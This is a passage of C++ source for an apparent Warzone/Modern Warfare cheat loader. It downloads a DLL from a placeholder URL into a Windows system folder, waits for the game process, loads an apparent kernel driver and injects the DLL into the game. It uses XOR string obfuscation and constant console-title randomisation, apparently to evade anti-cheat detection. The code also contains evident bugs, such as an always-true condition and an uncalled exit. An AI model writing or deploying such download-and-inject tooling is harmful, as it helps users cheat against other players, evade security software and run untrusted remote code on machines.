 68 | #define CENTERY (GetSystemMetrics(SM_CYSCREEN)/2)-(s_height/2)  //scrollbar remove
 69 | LPDIRECT3D9 d3d;    // the pointer to our Direct3D interface
 70 | LPDIRECT3DDEVICE9 d3ddev;
 71 | HWND hWnd;
 72 | const MARGINS  margin = { 0,0,s_width,s_height };
 73 | 
 74 | void TitleThread()
 75 | {
 76 | 	while (true)
 77 | 	{
 78 | 		SetConsoleTitleA(random_string().c_str());
 79 | 	}
 80 | }
 81 | std::thread Title(TitleThread);
 82 | int main()
 83 | {
 84 | 	Title.detach();
 85 | 	
 86 | 	HANDLE hInput;
 87 | 	DWORD prev_mode;
 88 | 	hInput = GetStdHandle(STD_INPUT_HANDLE);
 89 | 	GetConsoleMode(hInput, &prev_mode);
 90 | 	SetConsoleMode(hInput, prev_mode & ENABLE_EXTENDED_FLAGS);
 91 | 	//scrollbar off
 92 | 	HANDLE out = GetStdHandle(STD_OUTPUT_HANDLE);
 93 | 	SHORT cols = 100, rows = 20;
 94 | 	SetConsoleWindow(out, cols, rows);
 95 | 	int counter = 11; //amount of seconds
 96 | 
 97 | 	string dwnld_URL = "DOWNLOAD LINK GOES HERE";
 98 | 	string savepath = "C:\\Windows\\Logs\\bobo.dll";
 99 | 	URLDownloadToFileA(NULL, dwnld_URL.c_str(), savepath.c_str(), 0, NULL);
100 | 	if ("C:\\Windows\\Logs\\bobo.dll") 
101 | 	{
102 | 		setcolor(7);
103 | 		std::cout << "                        discord.gg/bobo                        \n\n\n";
104 | 		DriverInitialization();
105 | 		//driver();
106 | 		cout << endl;
107 | 		setcolor(7);
108 | 		cout << xor_a("[-] Open Modern Warfare..") << endl;
109 | 
110 | 		while (FindWindowEx(NULL, NULL, xor_a("IW8"), NULL) == NULL) {
111 | 			cout << ".";
112 | 			Sleep(1000);
113 | 		}
114 | 
115 | 		system("cls");
116 | 
117 | 		std::cout << "                        discord.gg/bobo                        \n\n\n";
118 | 
119 | 		cout << xor_a("[+] Recognized process..") << endl;
120 | 		Sleep(2000);
121 | 		setcolor(2);
122 | 		cout << xor_a("[>] Injecting, listen for the 'BEEP' and closing after") << endl;
123 | 		Sleep(2000);
124 | 		Enject(xor_a("IW8"), xor_w(L"C:\\Windows\\Logs\\bobo.dll"));
125 | 		Beep(200, 400);
126 | 		MessageBox(NULL, "[+] Injected Warzone Tool.\n[+] Press 'OK'", "Security", 1);
127 | 		//setcolor(7);
128 | 		//cout << xor_a("[>] Inject, Closing. . .") << endl;
129 | 		cout << endl;
130 | 		Sleep(666);
131 | 	}
132 | 
133 | 	cout << endl;
134 | 	//Sleep(1000);
135 | 	exit;
136 | }
137 | 


--------------------------------------------------------------------------------